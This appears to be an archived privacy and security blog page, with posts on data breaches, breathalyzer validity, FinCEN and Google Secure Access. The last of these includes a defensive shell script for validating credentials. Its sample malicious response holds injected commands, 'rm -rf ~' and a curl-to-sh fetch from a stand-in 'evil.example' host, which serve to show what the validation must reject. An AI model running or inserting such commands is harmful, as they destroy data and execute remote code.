Harper’s Privacy Framework for DHS

Jim Harper writes:

At this week’s meeting of the Department of Homeland Security’s Data
Privacy and Integrity Advisory Committee, Joanne McNabb, Chief of the
California Office of Privacy Protection, and I circulated and
presented a draft ‘Framework’ for assessing homeland security
programs in terms of their consequences for privacy and related values.

Members of the Committee will be reviewing it and “test-driving” it
in their respective work and studies of DHS programs and technologies.

Public comment on the draft would also be welcome, addressed to


I’ve skimmed it, and it looks really interesting. I wish I had more time to think about it deeply. From Politech, via IP.

Fishermen’s Friend, Breathalyzers

It comes after a 24-year-old driver was found to be over the legal drink-drive limit during a routine control in Munich. He was taken to the police station where blood tests found he had no alcohol in his system. The man was released after officers found the strongest thing he had taken was a Fisherman’s Friend.

Forensic doctor Thomas Gilg said the essential oils contained in the throat sweets reacted in the same way as alcohol on hand-held breathalysers. He said in tests they found just three of the mentholated sweets could cause a motorist to test three times over the legal limit.

My first question is, is this for real? Turns out there is a Prof. Dr.med. Dr.med.habil. Thomas Gilg at a medical school in Munich. I can’t find a paper or abstract, but I can see that T. Gilg publishes on forensic analysis. Good enough for now.

My second question relates to the breathalyzer, and its scientific validity. As Schneier pointed out in “DUI Cases Thrown Out Due to Closed-Source Breathalyzer,” the people who make these things don’t like to talk about how they work. If we don’t know how they work, how can we assign guilt on the basis of what one says? (Me, I think everyone with halitosis is guilty.) Is the breathalyzer the next polygraph — beloved of the CIA, but with no validity under Daubert?

From Ananova, “Sucking a Fishermen’s Friend could get you into trouble,” via Blondesense, via Sivacracy.

“Remains Safely Anonymous”

People seem to dig Star Wars posts. I could probably blog for a month on security lessons, illustrated with Star Wars quotes, but I’d need to buy the DVDs and get some video capture technology, and …


…ok. You’ve convinced me. Friday Star-Wars-security-lessons-blogging it is.

Ben: The “other” he spoke of is your twin sister.

Luke : But I have no sister.

Ben: Hmm. To protect you both from the Emperor,
you were hidden from your father when you
were born. The Emperor knew, as I did, if
Anakin were to have any offspring, they would
be a threat to him. That is the reason why
your sister remains safely anonymous.

That’s right. Keep listening to the crazy old hermit; he knows security: Anonymity protects children from those who would do them harm. If you can’t find the child, you can’t turn them to the dark side.

Be sure to tune in next Friday, when Admiral Piett’s actions illustrate Kerckhoffs’s principle.

Bugger Productivity

It’s not like I was getting any work done anyway. (Ok, actually I was: Five of yesterday’s six posts took under 10 minutes, and four took 5 minutes or less.) But:

  • Scientists invade the privacy of giant squid, intruding on their long-preserved solitude. Also be sure to notice National Geographic’s beautiful user interface for selecting photographs.
  • Ray Everett-Church has the right comments on the sad passing of Don Adams, in “Owner of World’s First Mobile Phone Dies.”
  • EPIC has good commentary on “Mass. Grocer to Market to Customers’ Wireless Phones,” including why this is more invasive than other “loyalty card” programs, and why they’re fooling you with the promise of lower prices.
  • The Wall St Journal has an article on the mash being made of the Do-Not-Call list, “Do-Not-Call Lists Under Fire.” It’s enough to make you think that the forthcoming data protection law shouldn’t have any state preemption. (Thanks to Rob for the pointer.)
  • And lastly, Republican Congressmen are questioning if the Pentagon is trying to evade oversight, as the New York Times reports in “Republicans See Signs That Pentagon Is Evading Oversight.”

University of Georgia, 2400 SSNs, Hacker

ATHENS – A hacker broke into a computer database at the University of
Georgia, gaining access to the Social Security numbers of employees in
the College of Agricultural and Environmental Sciences and people who
are paid from that department.

More than 2,400 numbers, belonging to roughly 1,600 people, may have
been exposed, UGA spokesman Tom Jackson said Wednesday.

The names and numbers were not connected on the documents, Jackson
said, but an experienced hacker could be able to interpret the data
well enough to match them.

I don’t understand how 1,600 people have 2,400 social security numbers unless one of them worked for RBC Dain Rauscher.

From the Atlanta Journal Constitution, “Computer breach reported at UGA,” via InfoSec News.

FinCEN Effectiveness

At the Counter-Terror blog, Andrew Cochran writes: “Treasury Department’s FinCEN Unit Recovering From “Cyberjacked” E-Mail System:”

The most important impact of the cyberjacking has been to shut down the automated system whereby FinCEN and law enforcement request and receive information from financial institutions for use in terrorism and money laundering cases.

The system, enacted under section 314(a) of the PATRIOT Act, took several years and numerous hiccups to implement, but it’s operated quite smoothly for over a year. Starting in March, FinCEN posted 314(a) requests for information on a secure website for review and response by over 24,000 financial institutions. FinCEN periodically issues results of the 314(a) requests, with the most recent out on September 13 (I had posted discussions of 314(a) request reports earlier this year here and here). According to this report, the requests for information issued since the 314(a) request system began in February 2003 have resulted in 157 cases involving terrorism or terrorist financing and 272 cases involving money laundering. The results of the cases thus far are, quoting from the September 13 report:

1091 Grand Jury Subpoenas
13 Search Warrants
154 Administrative Subpoenas/Summons/Other
77 Arrests
72 Indictments
10 Convictions

$14,405,053.64 Total Dollar Amount Located

In my opinion, that’s a good track record which merits a ‘congrats’ to FinCEN, law enforcement, and the participating financial institutions. Although there was no compromise in the 314(a) system itself, FinCEN was wise to shut it down while they run security tests. They plan to transmit 314(a) requests in another manner until they can restore the automated system.

That’s a good track record? 24,000 institutions all reviewing these requests for ten convictions? (And is that a normal ratio of 1258 subpoenas/warrants/etc to 77 arrests?) No wonder our credit card fees are going up. Note especially the FDIC’s instruction:

SISS can only be accessed by the financial institution’s designated Section 314(a) points of contact. If you use a third-party vendor or product to conduct searches, your institution is still required to log on and review the information on the SISS. (Emphasis mine.)

As Cochran’s co-blogger Victor Comras pointed out, “these rules have turned out to be a much more controversial matter than originally envisaged, and have provoked the ire of banking managers across the country.” 24,000 institutions are required to review an endless stream of requests to find, well, on first glance, enough money to fund 28 September 11th scale attacks. Or perhaps, since roughly 2/3rds of the cases are “money laundering” and not terrorism related, it’s enough “terrorist money” to fund 9 attacks. But the total isn’t broken down by investigation type, so it’s hard to say what fraction should be attributed to “terrorist financing.” Maybe they’ve seized some convent’s savings account, much like they’ve put nuns on the no-fly list? I just don’t understand how this can be seen as a good return on investigative effort.

What About My Needs?

While everyone (FCC, FBI, RIAA) is lining up to decide what software you can run, I’d just like to ask that I be included in the list.

The Federal Communications Commission thinks you have the right to use software on your computer only if the FBI approves.

No, really. In an obscure “policy” document released around 9 p.m. ET last Friday, the FCC announced this remarkable decision.

According to the three-page document, to preserve the openness that characterizes today’s Internet, “consumers are entitled to run applications and use services of their choice, subject to the needs of law enforcement.” Read the last seven words again.

Actually, no. I’d like to decide what software I run, subject to my needs. Thank you. (From “FBI to get veto power over PC software?“)

RBC Dain Rauscher, 300,000 SSNs, Disgruntled former employee


The FBI has opened an investigation into the possible theft of personal information about some clients of RBC Dain Rauscher Inc.

The chief executive of the Minneapolis-based brokerage firm disclosed the problem in a letter sent to 300,000 households. Dain Rauscher has not yet detected any fraudulent activity in their accounts, according to the letter from Dain head John Taft.

“While we have no information to believe that your personal information has been compromised in any way, we are treating this as a serious situation,” Taft wrote.
FBI agent Paul McCabe said the agency does not know how many accounts might be affected.

(Yeah, I don’t have “no information to believe” neither. But I do have reason to believe that information about these people has been compromised.)

Dan Callahan, a Dain Rauscher spokesman, said some clients have received anonymous letters sent last week by someone claiming to be a former Dain employee. The letter, received by a seemingly random group of more than 100 account holders, contained each recipient’s name, address, tax identification number, birthdate and Dain Rauscher account number.

You mean social security number, don’t you?

The Star Tribune obtained a copy of the profanity-laced letter, whose author said he was seeking revenge on Dain Rauscher because the company fired him.

The writer claims to have been able to copy information from “thousands” of accounts because Dain Rauscher did not remove his password from a mainframe computer. He claims to have sold the information to an unidentified buyer.

And finally, the company takes a cunning move from the ChoicePoint playbook, putting its own victimhood ahead of that of its customers:

“We are a victim, just like our clients,” Callahan said. “We take their protection very seriously.”

Hint to Dain Rauscher: I referenced Larry Ponemon’s “After a privacy breach, how should you break the news?” months ago. It has some useful advice.

Quotes are from “FBI checking theft of Dain clients’ data,” via InfoSecurity News.

CUNY, Hundreds of SSNs, Exposed Files

The CUNY foul-up that put students’ personal information a Google search away from identity thieves was more widespread than first reported, with school officials saying yesterday that the Social Security numbers of hundreds of employees also got on the Web.

City University of New York officials detected the unprotected payroll link for Hunter College Campus Schools this past Wednesday after a law student tipped them about search engine links to CUNY files.


But while 335 Queens College law students got alerts on the breach Thursday, CUNY waited until Friday to e-mail memos on the Hunter problem that involved 265 workers and 171 former workers and retirees from the elementary and high schools, according to the Hunter memo and CUNY’s chronology.

From Newsday, “New CUNY security slip“, via Privacy.org.

More On Cardsystems Lawsuit

Joris Evers continues to report well on the Cardsystems lawsuit, this time in “Judge looks for links in credit card case:”

Kramer said he wants to be clear on which defendants fall under California civil code section 1798.82, the notification statute. While it is clear that the breach was at CardSystems, the law applies to entities that “own or license” personal information about Californians. Plaintiffs in the case say that includes Visa, MasterCard and Merrick.

“I believe we have to figure out whether indeed Visa, MasterCard and Merrick are covered by the statute. They don’t seem to own the data, but the plaintiffs’ view is that they are operating with a license,” Kramer said. He ordered all parties to prepare for a trial on that matter and to exchange information.

That makes it much clearer why this is not cut and dried. I previously mentioned the suit in “Cardsystems Breach and Notice.”

Google VPN, Macs, and Privacy

NudeCybot (hey, you’re blogging again!) asked me for opinions on Google Secure Access (or just GSA), and sent me a link to Kevin Stock’s Google Secure Access on Mac OS X. There’s a lot of critiques of Google’s Privacy policy around GSA: “Hide what you’re doing from everyone but us! And, umm, anyone who asks us real nice.” So lets look at exactly what Google sees.

One of the things Kevin shows is that by visiting https://vpn.google.com/getpass/, you’re given the IP address of a server, a username and a password. Now, that’s fascinating to me, because you can use a tool like curl to download the access bits, and you can do so without a cookie. That matters, because it means there is nothing on Google’s side to link one credential fetch to the next, or to the rest of your Google activity. You can even fetch the data over Tor, via a local Privoxy:
curl --proxy localhost:8118 https://vpn.google.com/getpass/
Add “-D -” to dump the response headers to stdout, and you can see that Google isn’t even setting a cookie on the connection.

So it’s not clear that Google knows who the users of GSA are. Unlike a lot of their services, it doesn’t require that you share your “Google name” with them. Google names include gmail, orkut, or often even your regular Google cookie. (Come on, whose name do you search on most?) But that’s not strong privacy, and it’s likely to break: the tunnel terminates at Google, so anything you send in the clear inside it is readable there. Log in to a non-SSL site, or ego-search, or, umm, expose your cookies to them, and the linkage is back. It could break if you check email without encryption.

Jumping back to Kevin’s script, I found the AppleScript solution both slow and a bit worrying (an attacker pretending to be Google can feed stuff into that script). So I started writing a shell script to do much the same thing, with a few bits of code added for resilience against attackers. The only bit missing is exactly how to feed a password into the Mac’s command line pppd.
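As an added example (my own sketch, not Kevin’s script and not anything Google ships), here is the shape of the input checking a shell version needs before any fetched value goes near a command line or a pppd options file. The field names server=, user= and pass= are an assumption about the page format; the sample responses and header dumps are constructed; the live fetch is shown but not executed.

```shell
#!/bin/sh
# Added example, not Kevin Stock's script and not Google's code.
# The "field=value" response format is an ASSUMPTION; the real page may differ.

# Constructed sample of a well-formed getpass-style response.
GSA_SAMPLE_GOOD='server=10.0.0.1
user=abcdef12
pass=Xy9-_kLm'

# Constructed sample of what an impostor could return to a script that
# interpolates the response into a shell command or an options file.
GSA_SAMPLE_EVIL='server=10.0.0.1; rm -rf ~
user=abcdef12
pass=$(curl http://evil.example/x|sh)'

# Constructed header dumps, with and without a cookie being set.
HDR_NO_COOKIE='HTTP/1.1 200 OK
Content-Type: text/plain'
HDR_COOKIE='HTTP/1.1 200 OK
Set-Cookie: PREF=ID=deadbeef; path=/'

# gsa_field FIELD RESPONSE: print the value of the first "FIELD=..." line.
gsa_field() {
    printf '%s\n' "$2" | sed -n "s/^$1=//p" | head -n 1
}

# gsa_valid_ip IP: exactly four dotted octets, each 0-255, nothing else.
gsa_valid_ip() {
    printf '%s\n' "$1" | awk -F. '
        NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++)
              if ($i !~ /^[0-9][0-9]?[0-9]?$/ || $i + 0 > 255) exit 1
          exit 0 }'
}

# gsa_valid_token TOKEN: conservative charset. Anything a shell or pppd
# could interpret (space, quote, $, ;, parentheses, newline) is rejected.
gsa_valid_token() {
    case "$1" in
        '' | *[!A-Za-z0-9._-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# gsa_check RESPONSE: 0 only if all three fields are present and well-formed.
gsa_check() {
    ip=$(gsa_field server "$1")
    user=$(gsa_field user "$1")
    pass=$(gsa_field pass "$1")
    gsa_valid_ip "$ip" && gsa_valid_token "$user" && gsa_valid_token "$pass"
}

# gsa_has_cookie HEADERS: 0 if any Set-Cookie header appears in the dump.
gsa_has_cookie() {
    printf '%s\n' "$1" | grep -iq '^set-cookie:'
}

# gsa_fetch: the live call, shown for completeness and not run here.
# --proxy routes through a local Privoxy/Tor; "-D -" dumps the response
# headers to stdout so a Set-Cookie line is visible; -sS and --fail keep it
# quiet and turn HTTP errors into a non-zero exit. Certificate checking is
# left ON (no -k): that is what stops someone pretending to be Google.
gsa_fetch() {
    curl -sS --fail --proxy localhost:8118 -D - https://vpn.google.com/getpass/
}
```

The strict charsets are the point: an impostor who can answer the HTTPS request (a hostile proxy, poisoned DNS, or a user who added -k to silence a certificate warning) cannot turn the response into commands, whereas a script that does ssh $server or writes the password into an options file unescaped is one line away from running whatever came back. Feeding the validated password to pppd remains the open question from the post.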

Some technical comments on Kevin’s scripts are after the break.


North Fork Bank, 9000 mortgageholders (Not SSNs), stolen laptop

Data relating to about 9,000 mortgages that were originated by Countrywide Home Loans but sold to North Fork were in the laptop, according to a letter received by a customer on Thursday. The laptop was one of several stolen over the July 24 weekend, the letter said without identifying the office. The data included the customer’s name, address and mortgage account number but, at least for that customer, not her Social Security number.

Newsday attempts to obtain comment from North Fork were unavailing. But a customer who called a number listed on the letter for more information was told an arrest had been made, although no details were given about where or when that arrest occurred.

From “North Fork sends out letters after a laptop containing data for about 9,000 mortgages was stolen,” courtesy of Chris Walsh.

What Is Phishing

In conversation with a friend, I realized that my essay, “Preserving the Internet Channel Against Phishers” didn’t actually explain the problem. I made the assumption that everyone had the same perception of what it was. (Why didn’t anyone point that out?) So I’ve added the following (after the break), and I think the resultant essay is much improved.


A Life, Observed

A blogger who I’d recently discovered has retired:

I’ve always had my two lives separated – my offline world and my online one. That’s the way I wanted it and that’s the way I set it up and I’ve got my own reasons for it. And someone decided to ruin all the fun and be a smug ass about it and go to incredibly great lengths to find out where I “live” online. And they managed to do it, and now they’re all snide about it.

(The blog and its archive went away while I edited this post. Google isn’t showing a cache, and it’s gone from my cache. The longest excerpt I can find is on PSoTD.)

I’m sad, but I respect her decision. I tried blogging anonymously for a while. It was tough to get attention. I made a conscious choice to tie this blog to the same name I use in the security industry.

Soj made a conscious decision to use a nickname. The ability to explore ways of thinking without having to commit to them or answer for them is important. And privacy is what allows that. If (for example) security expert Bruce Schneier wanted to re-evaluate the case for national ID cards, he would probably not use his blog for that. He might want words he writes or says as he explores an idea to be private.

As we move to a society where we’re recorded in public, in taxis, in subways, in restaurants, or in our homes, our ability to enjoy the benefits of privacy disappears. (Think home cameras just spy on the nanny? Think again.)

Some people will definitely feel safer as their lives are recorded. The rest of us will be all the poorer for not having Soj Flog the Simian anymore, or thousands of other projects, which, chilled, never see the light of day.

(Thanks are due a number of folks for suggesting links for that last paragraph, especially R for mentioning Banksy.)